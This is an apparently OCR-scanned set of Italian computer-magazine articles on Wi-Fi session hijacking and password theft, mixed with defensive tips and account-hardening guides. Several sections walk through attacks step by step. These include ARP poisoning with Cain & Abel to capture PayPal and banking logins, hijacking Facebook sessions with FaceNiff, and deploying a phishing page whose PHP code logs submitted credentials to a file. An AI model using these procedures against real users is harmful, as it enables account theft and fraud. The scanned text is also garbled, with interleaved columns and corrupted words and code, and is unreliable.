caso, in questa nostra inchiesta analizzeremo 
proprio tali tecniche: rimarremo letteralmen- 
















Password Internet bucate | 


Ti spio da PCC* 


FACEBOOK, MSN, HM11ER... A RISCHIO INTERCETTAZIONI 


Risale a qualche mese fa il rilascio per 
Firefox di un’add-on sviluppata dal pro¬ 
grammatore Eric Butler (http://codebut- 
ler.com), desideroso di far luce sulla de¬ 
bolezza del protocollo HTTP. L'add-on si 
chiama Firesheep e consente di applica¬ 
re la tecnica del sidejacking in maniera 
semplice. In pratica, da un PC collegato 
in una rete Wi-Fi è possibile intercettare 
i cookie delle sessioni aperte dagli altri 
utenti. Il motivo di questa debolezza è 
legato al meccanismo di realizzazione 
delle sessioni tra server e Client. Una 
sessione autenticata sul Web funziona 
più o meno così: nel momento in cui ci 


presenza nel sistema operativo delle li¬ 
brerie di packet sniffing WinPcap (www. 
winpcap.org). Installato il file firesheep-O- 
. 1-1.xpi nel browser, è possibile accede¬ 
re alla sua interfaccia grafica dal menu 
Visualizza/Barra laterale/Rresheep. Con 
un clic sulla rotellina è possibile confi¬ 
gurare l’adattatore di rete che snifferà i 
pacchetti ( Preferences/Capture) . Fatto 
ciò si awia cliccando Start Capturing. 
Intercettati i cookie basta un clic per 
accedere alla sessione aperta. 

Sono anni che si discute sui rischi con¬ 
nessi alla privacy degli utenti tramite 
l'uso dei cookie, ma è ancora questo il 


5 (VoomiI vnualiiiAiM «uratn mi 


gistty!» 


• czxKtxjUer / fwesheep 





logghiamo con usemame e password 
ad un sito, questi ci invia un cookie che 
contiene un ID (un codice univoco) per 
identificarci durante la sessione (tempo 
di permanenza sul sito, prima del logout) 
o addirittura per le sessioni successive 
(quando visiteremo il sito in un altro 
momento). In questo modo, potremo 
sfogliare tutte le sue pagine senza dover 
inserire ogni volta usemame e password. 
E così, intercettando i cookie degli altri, il 
malintenzionato può clonare la sessione 
aperta della vittima e accedere al sito 
visitato direttamente con identità altrui. 

Come funziona il tool? 

Per funzionare in una rete Wi-Fi non 
protetta, Firesheep (http://github.com/ 
codebutler/firesheep/downloads) neces¬ 
sita di Firefox 3.6.12 o superiore (non 
è compatibile con la versione 4) e della 


meccanismo adottato dalla moltitudine 
dei servizi Internet. Firesheep non ha 
scoperto nulla di nuovo, ma ha avuto 
il merito di richiamare l’attenzione su 
tale problematica. Perché? Sia perché 
consente di effettuare il sidejacking in 
maniera trasparente (prima di Firesheep 
bisognava intercettare il traffico con uno 
sniffer di pacchetti, dissezionarlo in cer¬ 
ca di cookie, copiarne il codice, installare 
i cookie sulla macchina e iniettarli nei 



siti navigati dalla vittima) sia perché tra 
tutti i siti attaccabili c’erano nomi famosi 
come Facebook.Twitter, Gmail ecc. Que¬ 
sti colossi sono intervenuti per mettere 
una pezza, cambiando il codice dei loro 
cookie, ma non hanno risolto il proble¬ 
ma. Firesheep adotta infatti un modulo 
di cattura e filtro basato su script: in 
sostanza, ogni pacchetto intercettato 
in una sessione HTTP viene analizzato 
alla ricerca dell’intestazione in cui di 
solito risiede il cookie e viene gestito 
secondo la logica codificata nei suoi 
script, in base al sito navigato (si trovano 
nel menu Preferences/Website$ . Resta 
chiaro che laddove uno di questi siti 
modifichi la struttura del proprio cookie, 
Firesheep potrebbe non funzionare più 
nei suoi confronti, in quanto la struttu¬ 
ra del filtro di Firesheep trancerebbe 
alcuni spezzoni del cookie necessari 
all’autenticazione, invalidando l’attacco. 
Il cookie, per garantirne l’accettazione 
da parte del sito che lo ha emesso, non 
deve essere infatti alterato. Proprio per 
questo, intorno a Firesheep, si sta svi¬ 



luppando una comunità di persone che 
mantengono aggiornati gli script dei siti 
passibili di intercettazione. 

Come difendersi? 

Per proteggerci da attacchi di sideja¬ 
cking, più che cambiare i cookie an¬ 
drebbe modificato il sistema di login. 
Ma intanto, come possiamo proteggerci 
da Firesheep? Sono stati pubblicati al¬ 
cuni Add-on per Firefox che segnalano 
la presenza di un host con Firesheep 
attivo: Blacksheep (www.zscaler.com/ 
blacksheep.html) è il più famoso. Il suo 
meccanismo è basato sull'invio di false 
credenziali per verificare, tramite sniff 
della rete stessa, se qualcuno le stia uti¬ 
lizzando. Questo metodo, però, impatta 
negativamente sulle performance della 
rete locale che si vedrà inondata di infor¬ 
mazioni errate. Ancor peggio, su questa 
filosofia, è il lavoro di Rreshepard (littp:// 
notendur.hi.is/~gasl5/FireShepherd), 
un tool che inonda la rete per saturare i 
buffer di cattura del modulo di Firesheep 
e costringerlo al crash. Altra soluzione è 
ricorrere ai provider di servizi al proto¬ 
collo HTTPS: in attesa di questo, però, 
è consigliabile, soprattutto in reti Wi-Fi 
pubbliche, ricorrere a soluzioni quali 
https-everywhere de\\a Electronic Fran¬ 
ger Foundation, che permette di adottare 
connessioni crittografate (HTTPS ap¬ 
punto) con dei proxy pubblici (fidati) tra 
il nostro host e la rete Internet, evitando 
i rischi di intercettazione on-the-fly). 


te a bocca aperta nello scoprire con quanta 
facilità i pirati riescano a compiere le loro 
malefatte e di come il concetto di “privacy 
sul Web” sia del tutto inesistente. 

Nei panni dei pirati 

Si chiama "sidejacking" ed è la tecnica adottata 
per clonare le sessioni aperte da ignari utenti che 
si sono loggati ad un servizio Web. Per mettere 
in pratica il suo piano malvagio, il pirata non 


ha bisogno nemmeno di mettere mani sul PC 
della vittima: gli basta entrare nella stessa rete 
senza fili! In pratica, il pirata si interpone tra il 
PC del malcapitato ed il router ADSL che offre 
la connettività Wi-Fi, intercettando così i cookie 
rilasciati da Facebook, MSN, Yahoo e chi più ne 
ha più ne metta. Durante la procedura di login, 
la maggior parte di questi siti Web invia un ID 
univoco al computer che tenta di accedere al 
servizio, una sorta di lasciapassare temporaneo 


che ne permette la corretta autenticazione. 
È proprio analizzando il contenuto di questo 
file (cookie) che il pirata può intrufolarsi nella 
sessione aperta con l’identità della vittima. Lo 
sconcerto sale alle stelle nel momento in cui 
scopriamo che grandi nomi come quelli citati 
poco fa, affiancati da numerosi servizi di Web- 
mail (come Libero, Virgilio ecc.) non hanno 
ancora trovato una valida soluzione che possa 
metterci al sicuro. Attenzione: tutto ciò acca- 
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NON SOLO HRESHEEP 


Firesheep, oltre ad essere la prova 
evidente della scarsa sicurezza in 
Rete, è il mezzo che facilita notevol¬ 
mente la vita al pirata improvvisato. 
Ma, purtroppo, non è né il primo né 
tantomeno l’ultimo tool per sniffare 
con successo i dati altrui. Nume¬ 
rosi sono infatti i software (come 
Hamster e Ferret) che consentono 
ai pirati di catturare facilmente i co¬ 
okie per poi ricavarne informazioni 
generiche o password di acces¬ 
so. Inoltre, per quanto riguarda gli 
sniffer di rete, non esiste soltanto 


il software Cain & Abel. Un altro 
famoso tool è appunto Wireshark 
(www.wireshark.org) che, al pari 
di Cain & Abel, nasce per scopi pu¬ 
ramente leciti. Nelle reti aziendali, 
ad esempio, viene utilizzato per 
monitorare il traffico dati, eseguire 
test di penetrazione ecc. Quindi, per 
chi ha cattive intenzioni, Fireshe¬ 
ep è veramente l'ultima ruota del 
carro: se qualcuno vuole davvero 
impossessarsi della nostra identità 
virtuale, avrà sempre in mano uno 
strumento per farlo. 


de unicamente quando siamo connessi ad un 
hotspot Wi-Fi privo di protezione! Nel caso in cui 
l'accesso alla rete sia delimitato da una chiave 
di tipo WEP oWFA (quest’ultima è preferibile 
alla prima), tutto sarà più difficile poiché ogni 
dato viaggia in maniera criptata utilizzando 
algoritmi alcune volte impossibili da scardi¬ 
nare. Ma fermiamoci un secondo a riflettere 


la città: quanti sono i dati che i pirati possono 
raccogliere nel giro di poche ore utilizzando 
un browsercome Firefoxe un plug-in di nome 
Firesheep? Un’infinità! 

Cain & Abel: il re deilo sniffing 

Ma la tecnica del sidejacking non è l’unica 
strada percorribile dal pirata per farsi i fatti 


Web possono essere 
spiate "in chiaro" e 
rubate per loschi scopi. 
Per eseguire tale attacco, 
il pirata usa un famoso 
strumento di analisi per 
reti interne: Cain & Abel. 
Nato inizialmente come 


sul numero di utenti che ogni giorno sfruttano altrui. Se ad esso affianca un attacco di tipo 


tool per amministratori 


di 


le reti senza fili aperte di centri commerciali, "man in thè middle” anche le credenziali reti LAN, al fine di generare 
bar, stazioni ferroviarie o di locali in giro per di accesso (username e password) ai siti statistiche sul traffico dati, 


Scacco matto alle password! 



Utilizzando un software per lo sniffino dei pacchetti in rete, il pirata può scovare tutte le chiavi di accesso digitate 
dalla vittima connessa allo stesso hotspot wi-Fi non protetto. Ecco come usano Cain & Abel. 



Il software essenziale 

•\ 1 II pirata si connette ad un hotspot Wi-Fi 
W libero e, dopo aver provveduto all’instal¬ 
lazione dell’ultima versione disponibile di Cain & 
Abel (www.oxid.it), lo avvia. Clicca Configure e 
tra gli adattatori di rete installati sul suo notebook, 
Ethernet e Wi-Fi, indica quale utilizzare per lo snif¬ 
fing. A tal fine seleziona quello wireless (nel caso 
in figura quello con indirizzo IP 192. 168.178.20j 
e conferma con OK. 


Scansione in corso 

2 f II pirata clicca sul pulsante Start/Stop Snif- 

_ _ J fere si sposta sul tab Hosts/Sniffer. Clicca 

con il tasto destro su una parte vuota dell’interfac¬ 
cia e seleziona Scan MAC Addresses per cercare 
gli altri Client connessi alla stessa rete. Seleziona 
All hosts in my subnet e ama il processo con OK. 
Al termine della scansione appare l’elenco dei PC 
connessi, incluso l’indirizzo IP del router ADSL che 
fornisce la connettività. 


▲ Bersaglio colpito 

2 Dal tab Sniffer il pirata seleziona la scheda 
APR in basso a sinistra, clicca la voce APR 
nella colonna a sinistra, preme in un punto vuoto 
del primo riquadro a destra e + nella barra in alto. 
Seleziona TIP del router ( 192.168.1.1) nella pri¬ 
ma colonna della nuova finestra e quello del PC 
vittima nella seconda. Conferma con OK Per atti¬ 
vare lo sniffing preme il pulsante Start/Stop APR. 
Appariranno i pacchetti della vittima. 


32 Win Magazine Speciali 

































































nel corso degli anni si è evoluto integrando 
funzionalità Wi-Fi. Cain & Abel è ora in 
grado di interfacciarsi con schede di rete 
senza fili per carpire i dati che circolano 
nella stessa WLAN. Ogni PC connesso al¬ 
la grande Rete tramite router può essere 
analizzato e "sniffato" per intercettare le 
credenziali utilizzate nelle procedure di 
login ai siti Web. Alcune risultano visibili 


direttamente in chiaro, per altre invece, 
è necessario analizzare con attenzione il 
certificato di autenticazione che il sito Web 
in questione ha "spedito" al PC richiedente 
e che il pirata ha ovviamente intercettato. 

Quali identità sono a rischio? 

Assolutamente sconcertante è scoprire co¬ 
me con quanta facilità vengono scoperte le 


password di accesso, non solo dei più noti 
forum del Web e delle Webmail dei provider, 
ma anche di servizi più delicati come Poste 
Italiane e Pay pai. Se si trova in una rete aper¬ 
ta (senza chiavi WEP o WPA), il pirata non 
ha nemmeno bisogno di prendersi la briga 
di analizzare il complesso testo contenuto 
in un certificato catturato: è lo stesso Cain 
& Abel a mostrare in chiaro username e pas- 
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■ Ecco come Mozilla Firefox ci mette in allerta da eventuali tentativi di sniffing. Quando 
vedremo apparire un’immagine come in figura, stiamo bene attenti a ciò che digitiamo 
sulla tastiera. Potremmo essere spiati. 




» Reperì 
t. V ùucrt 
lì ► Scansione 


S % Genette 


Q Avne AnwVtr ftg -cema* - Crea ioòvmrs 


: ^aptvecutt 



■ Avira AntiVir segnala se qualcuno tenta di sniffare i nostri pacchetti. Per attivare tale 
funzione cucchiamo col tasto destro sull'icona dell'ombrellino (nella System tray) e da 
Configura AntiVir/Genarale attiviamo le opzioni come in figura. 




^ Obiettivo Pavpal! 

^ | Il malcapitato continua il suo girovagare 
/ sul Web senza sapere che qualcuno non 
aspetta altro che l’inserimento di una chiave di 
accesso a qualche servizio on-line. Il pirata si 
sposta quindi nel tab Passwords e raggiunge 
la voce HTTP. Qui appariranno in chiaro tutti gli 
Username e Password digitati dalla vittima. Fra 
queste, incredibile ma vero, c’è anche quella di 
Paypal. 


Per MSN c’è da analizzare 

5 I Dopo aver verificato che il bersaglio stia 
visitando la pagina di accesso ai servi¬ 
zi Windows Live (dalla colonna URL del tab Pas¬ 
sword |, il pirata si sposta nella scheda APR e 
clicca sulla voce APR-HTTPS : da qui, con un clic 
destro sul pacchetto sniffato ( Filename ), seleziona 
Viewe analizza il contenuto del file, ricercando nel 
documento i campi login e passwd che contengo¬ 
no i dati d’accesso. 


Internet bankinq 
6 e posta sotto assedio 

Con la modalità adottata al Passo 4. il pira¬ 
ta recupera i dati di login al sito Poste.it, nel momen¬ 
to in cui la vittima effettua il login. Anche in questo 
caso, nome utente e password ve ngono visualizzati 
in chiaro dal software di sniffing. Inoltre, se la vittima 
awiasse un Client di posta installato sul PC (quindi 
non con Webmail), la password verrà visualizzata in 
P0P3 o IMAP della scheda Password. 
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1 OCCHIO ALLE RETI APERTE DEI PRIVATI 

Se troviamo una Wi-Fi non protetta, non 
sentiamoci furbi solo perché possiamo 
scroccarne la connessione. Potrebbe essere quella 
di un pirata che l’ha sprotetta appositamente per 
far abboccare le sue vittime. 


2 CON LA CHIAVE E MEGLIO 

Prediligiamo gli hot spot 
pubblici che consentono 
la navigazione gratuita fornendo 
f'' una chiave di protezione WPA. In 
tal caso, tutto il traffico dati viene 
criptato e risulterà incomprensibile ad 
un eventuale sniffer di rete. 


3 NON LOGGHIAMOCI IN PUBBLICO 

Negli hotspot Wi-Fi di libero accesso 
(pub, università, aeroporti, hotel ecc.) 
navighiamo esclusivamente su tutti quei siti che 
non richiedono login. Qualche malintenzionato 
potrebbe essere in ascolto. 
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Password Internet bucate 


sword digitate per il login. Appare evidente 
che col legandosi ad un hot spot abbastanza 
nutrito di naviganti (ad esempio in un'uni¬ 
versità o in un locale pubblico) un pirata 
può entrare velocemente in possesso del 
conto Paypal (c non solo) di centinaia di 
ignare vittime. Numerosi servizi di internet 
banking proteggono però tutti i loro clienti 
da attacchi di questo tipo adottando tecni¬ 
che di protezione quali HTTPS ed SSL, che 
potrebbero garantire quella privacy assolu¬ 
tamente necessaria per lo meno in questo 
settore. Tale soluzione non sembra essere 
presa in considerazione dagli operatori di 


telefonia mobile (test effettuati su account 
H3G e Vodafone), che consentono ai propri 
utenti di controllare il traffico telefonico 
effettuato o acquistare servizi e ricariche 
direttamente dai loro siti Web. Leggero filo 
da torcere arriva dai servizi Windows Live: 
in questo caso infatti, Gain & Abel non è in 
grado di visualizzare automaticamente i 
dati di accesso inseriti ma, il pirata, ricer¬ 
ca nel giusto file catturato i campi "user” e 
“password" nei quali sono riportati i dati che 
tanto desidera conoscere. Ed ancora Libero, 
loomla... insomma, nessun servizio pare 
essere risparmiato! 


NAVIGAZIONI WEB: ISTRUZIONI PER L’USO 

10 dritte per proteggere la propria rete da eventuali intrusi 


5 ALLA LARGA DALLA POSTA 

Quando siamo connessi ad una rete che non 
ci appartiene, evitiamo persino di avviare il 
Client e-mail (Outlook, Thunderbird ecc.). Sniffer 
come Cain & Abel impiegano pochi secondi ad 
intercettare la password della nostra casella di 
posta elettronica. 


6 PASSWORD SEMPRE DIVERSE 

Molti, per semplicità, usano la stessa pas¬ 
sword in tutti i siti Web. A prescindere dalla 
sua complessità e lunghezza (alfanumerica ecc.), 
al pirata è sufficiente intercettarne una per tentare 
l’accesso a tutti quei servizi in cui Cain & Abel 
riesce a beccare in chiaro solo lo username. 


7 INSTALLIAMO UN BUON ANTIVIRUS 

Avira AntiVir (www.avira.com) è in grado 
di segnalarci se qualcuno aH’interno della 
rete a cui siamo collegati sta tentando di sniffare 
il nostro traffico dati. In tal caso, scolleghiamoci 
immediatamente! 


8 CAMBIARE FA BENE 

Periodicamente (con la rete di casa) cam¬ 
biamo le password di accesso ai siti Web, 
soprattutto quelle relative alla posta elettronica. In 
questo modo, se siamo inconsapevolmente finiti 
nelle grinfie di un pirata, eviteremo di farci spiare 
all'infinito. 


9 IL BUON VECCHIO CAVO 

Ove non è necessaria la connessione senza 
fili (ad esempio se siamo in casa, vicino al 
router), colleghiamoci utilizzando un cavo Ethernet. 
Purtroppo, anche la nostra rete domestica, protetta 
con chiavi WEP o WPA, potrebbe essere craccata. 
Una volta dentro, il pirata potrebbe sniffarci. 


•4 A SEGNALIDAL BR0WSER 

H Se nella fase di login ad un sito appaio- 
■ wJr no messaggi di “connessione inaffida¬ 
bile” che di solito non appaiono, non proseguiamo 
con il login. Il certificato di sicurezza per tale 
sessione potrebbe essere stato intercettato. 


4 ASTE E PAGAMENTI SOLO A CASA 

Evitiamo di accedere a servizi come PayPal, 
eBay, PostePay o altro quando non siamo a 
casa nostra. Se qualcuno dovesse impossessarsi 
dei nostri account correremmo seri rischi. Altro 
che Facebook e Twitter! 




1 O 

O O £> 
o O, 










■ 


■ 



néwstreet:,, 

auto magazine & webtv motori 











j Facebook sei spiato | 



Facebook 
sei spiato 

Un semplice smanettone può 
bucare il tuo profilo. Ti facciamo 
vedere quanto è facile 


Cosa ci r 
occorre “ ' 

APP PER ANDROID 

FACESNIFF 

Quanto costa: Gratuito 
Sito Internet: 

http://sinfulandroid.com 


JB rrivare alla scoperta di qualsiasi password 
■ M è ormai quasi un gioco da ragazzi, anche 
J^»peril pirata alle prime armi. Oggi infatti 
sono sufficienti pochi secondi per mettere a 
repentaglio la sicurezza di ogni utente connesso 
a Internet, li per farlo, basta anche uno smart¬ 
phone Android. Grazie ad alcune applicazioni 
sviluppale per questa piattaforma, come ad 
esempio FaceSniff, il pirata è in grado di loggarsi 
con identità altrui su Facebook come se avesse 
i veri username e password. Usare Facesnìff è 
semplice e ciò deve far riflettere sulla poca si¬ 
curezza applicata dagli stessi fornitori di servizi 
on-line. Basterebbe, infatti, evitare di rilasciare 
cookie per garantire quella poca privacy in più 
crwxui pespn /ialp a tutti eli ienltri internauti. 


Accessi non autorizzati 

Un’altra tecnica utilizzata per rubare i dati per¬ 
sonali altrui prende il nome di Session hijacking 
e consiste nel dirottare i cookie rilasciati daisiti 
verso altri indirizzi IP della stessa rete, consen¬ 
tendo un’autenticazione multipla. Ciò avviene 
in ogni rete Wi-Fi, sia essa libera o crittografata 
da password di tipo VVPA2. In poche parole, 
il pirata fa in modo che un utente connesso a 
Internet e che cerca di raggiungere un sito Web 
(ad esempio Facebook) in realtà ne visualizzi un 
altro, identico ali’originale ma reaivxxato dal 
pirata stesso. Quando nome utente e password 
vengono inseriti, il gioco è fatto: tramite e-mail 
o via FTP, il pirata riceve i caratteri digitati! Più 
semplicemente, però, un eventuale malinten¬ 
zionato può adottare la pratica del social engi- 
neeringe inviare una serie di e-mail cercando d i 
convincere chi legge a cliccare sul linkriportato, 
facendogli credere di trovarsi all'interno del 
vero sito Web, mentre in realtà si tratta di quello 
fasullo. Analizziamo, quindi, quali sono i passi 
che compie il pirata per creare la finta home 
page di un sito come Facebook e raccogliere 
i dati personali di tutte le sue ignare vittime. 
















Facebook sei spiato 


□ Attacco al social network 


Basta una semplice applicazione Android per entrare negli account degli altri utenti. L’attacco avviene sfruttando 
una rete Wi-Fi ed è piu semplice di quanto si possa pensare! Diamo uno sguardo alla procedura. 


Impostazioni privacy 


Cancella cache 

pnceipaiiCpfttènUti e I database 

nella càÉ> 


Cancella cronologia 

Cancella la cronologia di esplorazic 
del browser 




Unknown 

id:1630644354 

Unknown 

id:1613463422 


Pulizia nel browser 

| Se il pirata accede al proprio account 
Facebook anche dal telefonino, avvia 
browser integrato nel suo smartphone 
Android e si sposta nel menu Impostazioni. 
Da qui, ripulisce la Cronologia di navigazione. 
Cancella i cookie e anche tutti i dati memo¬ 
rizzati in cache. 


▲ FaceSniff in azione 

2 I II pirata si sposta ora sul PC e cerca 
'w-.J l sul Web il pacchetto FaceNiff-1.9.4- 
Ripper-Release.apk Lo trasferisce sullo 
smartphone e procede alla sua installazio¬ 
ne. A questo punto, si connette ad una rete 
Wi-Fffed avvia FaceSniff per tappare poi sul 
grande pulsante rosso. 


* Obiettivo raggiunto 

3 | La ricerca di una potenziale vittima 
<w i ha inizio: se qualche altro utente con¬ 
nesso alla stessa rete senza fili è connesso 
a Facebook, apparirà nella lista dopo soli 
pochi secondi. Al pirata basta tappare su 
uno dei nomi visualizzati per loggarsi con i 
dati dell'ignaro utente. 


□ Un clone davvero perfetto 


Ecco come il pirata informatico crea una home page fasulla di Facebook e, sfruttando tecniche di ingegneria 
sociale, riesce a raccogliere i dati personali di accesso al social network delle sue prede! 


Scarica il Fakelogin-Facebook 

t; ovviamente, da auanto avrete capito, è tutto GRATIS! 

lerisco che quel soldi li Investano per comprare casa grazie ad un pres 



# jin Apri » Salva ^ Annulla 

ei ‘post.php X 
<?php 

Autore : Pasquale Scarpati di « www.msnscan.co 
Script : Fakelogin Facebook 

:****•*•*»**««•***••***•*•*•«*/ 

header { * locailo n:htTp: //it it.facebook.com/’ ); 

Shandle * topenf dati.txt", ìtKtt 

foreachIS POST as Svariable => Svalue) { 
fwritelshandle, Svariable) ; 
fwritelshandle, •=•); 
fwritelshandle, Svalue); 
fwriteishandle, *\r\n"j; 



facebook 


Facebook ti aiuta a connetterti e rimanere in 
contatto con le persone della tua vita. 


a Tutto il necessario 

-J III pirata informatico si collega alla 
pagina http://google/LQM2D ed effet¬ 
tua il download di una falsa home page di 
Facebook già pronta all’uso. Al termine del 
download estrae il contenuto dell'archivio 
compresso in formato ZIP sul Desktop del 
suo computer. 


Aj Ttittoin untile 

2 III pirata accede alla directory nel 
J la quale ha scompattato l'archivio e 
apre il file post.php con un editor di testo 
non formattato (ad esempio Blocco Noté) per 
assegnare un nome al file nel quale verran¬ 
no memorizzati i dati delle vittime (nel caso 
in figura dati.ttl). 


^ Home page fasulla 

3 | Al pirata non resta quindi che carica- 
re i tre file scompattati nel suo spazio 
Web (ad esempio uno gratuito con Altervista) e 
inviare un'e-mail con il link da raggiungere: la 
pagina visualizzata, però, non è quella vera di 
Facebook, quindi occhio all’indirizzo mostrato 
nel browser! 
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Gooale Plus. YouTube. Android Market... basta un account e sei 

padrone del Web! Attenzione, però, aali accessi non autorizzati! 


Come ti blindo si 

_ _ _ m wm ACCOUNT GOOGLE 

l’account Gmail 


P ossedere oggi un accountGoogle significa 
avere accesso a una vasta serie di servizi 
Web, così ampia da poter rappresentare 
da sola la nostra vita digitale su Internet. Google 
Plus, YouTube, Android Market, Docs sono solo 
alcuni degli strumenti messi a disposizione 



Doppia verifica per cominciare 

\ La “verifica in due passi" aggiunge protezione 
al nostro account. Dopo aver inserito i dati di 
accesso (login) a Gmail, cucchiamo sul nostro 
indirizzo, in alto a destra, e selezioniamo Impostazioni 
account , Cucchiamo su Utilizzo deità verifica in due 
passa<p'(digitiamo la password dell'account. se richie¬ 
sta) e poi Imposta verifica in due passaggi. 




Messaggi crittoqrafati 

0 Per aumentare la sicurezza, attiviamo il proto¬ 
collo HTTPS, che crittografa tutte le informa¬ 
zioni che passano per Gmail. Dal nostroaccount, 
clicchiamo, in alto a destra, sul simbolo dell’ingranaggio 
e selezioniamo Impostazioni Gmail. Da Generali , in 
Connessione browser selezioniamo Usa sempre https. 
Clicchiamo Salva modifiche in basso. 


gratis dalla casa di Mountain View e l'anello di 
congiunzione per tutti è sicuramente Gmail. 
Ciò significa, però, che chiunque abbia accesso 
al la nostra username e password, può davvero 
combinarne di tutti i colori. E parecchi truffa¬ 
tori del Web san no come fare... Per stare sicuri 



Serve un recapito 

a Nel menu Scegli un ’opz/oneselezioniamo Mes¬ 
saggio di testo ( SMS ) o chiamata. Più in bas¬ 
so, specifichiamo prefisso e numero del tele¬ 
fonino. Lasciamo spuntata la casella Messaggio di testo 
SMS e clicchiamo su Invia codice. Sul telefonino rice¬ 
viamo un SMS con il codice di verifica: riportiamolo 
nella casella Codice, clicchiamo Verifica epa Avanti. 



Via le tracce dal Web 

La cronologia di Google rimane on-line, con 
grossi rischi per la sicurezza. Per evitarlo, 
entriamo nel nostro account, andiamo in Impo¬ 
stazioni account e clicchiamo su Modifica di fianco a / 
miei prodotti. Se presente, clicchiamo su Rimuovi cro¬ 
nologia web in modo permanente, spuntiamo la casel¬ 
la e clicchiamo Rimuovi Cronologìa web, 


non è sufficiente cambiare password, anche se 
è una pratica che è bene adottare periodica¬ 
mente, ma bisogna imparare a difendersi. Per 
fortuna è Google a fornirci tutti gli strumenti 
necessari, come sistemi di accesso basati su 
codici di verifica o la crittografia dei dati. 



Un numero di riserva - 

I Nella pagina successiva premiamo Avanti e 
Stampa codici, spuntiamo Sì, ho una copia dei 
miei codici di verifica di backup e clicchiamo 
Avanti. Specifichiamo un numero di telefono seconda¬ 
rio (se è di rete fissa impostiamo Messaggio vocale 
automatico ), clicchiamo Avanti e Attiva verifica in due 
Dassaaai. Al loain riceveremo un codice via SMS. 



SICURI ANCHE 
SU FACEBOOK 


Di recente anche il noto social network ha 
introdotto la possibilità di accedere al servizio 
tramite SSL (Secure Socket Layer). Stiamo 
parlando delle connessioni HTTPS, un sistema 
che permette lo scambio dei dati su un canale 
di comunicazione criptato che impedisce l'in¬ 
tercettazione delle informazioni. Per accedere 
alla versione HTTPS di Facebook, clicchiamo 
sulla voce Account, in alto a destra, poi su 
Impostazioni account. Nell'elenco a sinistra, 
clicchiamo su Protezione e premiamo Na¬ 
vigazione Protetta. Mettiamo la spunta su 
Naviga su Facebook con una connessione 
sicura (https), quando possibile e premiamo 
Salva modifiche. 
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Chiudi tutte le porte al tuo PC 


Ti spio da PC 


Il tool usato dai pirati per scoprire i punti deboli 

dei computer collegati in Rete 


Chiudi tutte le 
porte al tuo PC 


Cosa ci /O 
occorre 

SOFTWARE PER U 
GESTIONE DELLE 
PORTE TCP/UDP 

CloseTheOoor 

Sito Internet: 

http://sounceforge.net/ 

projects/closethedoor 


U n computer connesso a Internet è co¬ 
stantemente esposto a rischi di sicu¬ 
rezza. E, tra i più subdoli per l’ignaro 
utente, ci sono sicuramente quelli dovuti a 
porte TCP/UDP "in ascolto". Stiamo parlando 
degli strumenti normalmente utilizzati per 
permettere lo scambio dati tra servizi: ad 


esempio quelli di posta (SMTP. POP, 1MAP 
ecc) oppure quelli per l’accesso al Web (Http 
o Https). A meno che il nostro PC non funga 
da server per un simile servizio, e dunque 
debba ricevere dati, tali porte devono risultare 
chiuse. Altrimenti siamo di fronte a un pos¬ 
sibile problema di sicurezza. Con il software 


CloseTheDoor possiamo identificare tutte le 
porte TCP/UDP in ascolto e i programmi che 
le stanno usando. In questo modo rileviamo 
le falle di sicurezza e applichiamo i rimedi 
per evitare eventuali attacchi che, nel caso 
peggiore, potrebbero assumere il controllo 
completo del nostro computer. 




Google: How to dot* tt*j poti 
Google: Atout thu pori 
Google: About this process 
WriopeOta Atout thts port 
Wttopedia About thrs pforesi 
LKage statistici of this port (tscsans.org) 


49157 TCPv 6 jvchost**. 


L«! 

5357 TCPv6 fiysteir) 

« 

!:<V 

49155 T CPvfc wimnitmrp 

: 552 


Troviamo le porte aperte 


| Dopo aver avviato CloseTheDoor, il programma scansiona tutte le por- 
| te in ascolto sul PC e ne visualizza un report. La finestra principale ci 
: mostra tutti i processi attivi con le relative porte utilizzate. Oltre a que¬ 
ste ultime, accediamo a tutti i servizi associati e otteniamo informazioni utili 
per capire se siamo esposti a pericoli di sicurezza. 


Applichiamo la soluzione 

Ciccando col tasto destro su una riga relativa a una servizio, possiamo 
localizzare l'eseguibile sul PC o terminarlo. Capire se il processo che 
impegna la porta è pericoloso o meno non è semplice. Tra le altre 
opzioni ci viene data allora la possibilità di effettuare una ricerca su Google per 
avere maggiori informazioni sulla porta e sul processo stesso. 



SCOPRI SE HAI UNA "BACKDOOR" RAGGIUNGIBILE DA INTERNET 


Attraverso il servizio Portscan possia¬ 
mo trovare le porte aperte sul nostro 
PC e raggiungibili da Internet. L’uso 
del servizio è alquanto semplice e 
non richiede l’installazione di alcun 
programma. Tutto quello che dob¬ 
biamo fare e recarci sul sito www. 
mambro.it/portscan. Si tratta di un 
servizio on-line che può essere uti¬ 
lizzato solo sul nostro computer. Per 
una questione di sicurezza, infatti, 
non è possibile controllare se altri 
host connessi a Internet abbiano 
a loro volta lasciato porte aperte. 
Portscan rileva automaticamente 
TIP col quale siamo connessi e ci of¬ 


fre due opzioni. Con SINGLE PORT 
PORTSCAN possiamo specificare 
la porta e avviare il test sulla stessa 
per verificare se sia aperta o meno. 
Dopo alcuni istanti un messaggio ci 
informerà del risultato del test. Nel 
caso la porta fosse aperta, possiamo 
provvedere a chiuderla in modo da 
non essere più esposti ad attacchi. 
La seconda opzione è STANDARD 
PORTS PORTSCAN e ci permette di 
eseguire una scansione delle porte 
standard. Dopo aver premuto il tasto 
test standard ports dovremo atten¬ 
dere circa un minuto per verificare se 
le stesse siano aperte o meno. 


n servino Portscan serve • trov 
verzicare la steure«a deHhost 

Per notivi di tfcnrerre potrali 

The PoHéCatil **r<nce r*n Im i 
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Por driver v r 
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srNGU PORT PORI 
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Il Melafonino 
ci spia! 

L'ALLARME È LANCIATO: FUNZIONI 
NASCOSTE E APP DI IPHONE E ANDROID 
RUBANO INFORMAZIONI PERSONALI 

VERITÀ, TECNICHE E TRUCCHI PER PREVENIRE IL FURTO DI DATI 



I mmaginiamo un oggetto di uso 
comune che si diffonde, a ritmo 
serrato, in tutto il mondo. Ognuno 
lo utilizza, lo ama, ne diventa dipen¬ 
dente. Poco tempo dopo, si scopre 
che proprio quell’oggetto, in realtà, è 
uno strumento pronto a spiattellare 
i segreti di ciascun suo utilizzatore a 
delle agenzie pronte a sfruttarli per 
fini commerciali. Una trama da fan¬ 
tascienza? Purtroppo è tutta realtà e 
quel diabolico oggetto altro non è che 
lo smartphone. 

LOTTA ALLE APP SPIONE 

Una recente inchiesta del Wall Street 
Journal rivela che moltissime "app", 
ossia applicazioni, per dispositivi 
Apple e Android diffondono i dati 
personali degli utenti, a loro insa¬ 
puta. Già, parliamo proprio di quella 
tonnellata di programmi, a volte gra¬ 
tuiti altre no, scaricabili da servizi 
quali App Store e Android Market. 
Nella maggior parte dei casi si tratta 
di applicazioni innocue, che fanno 
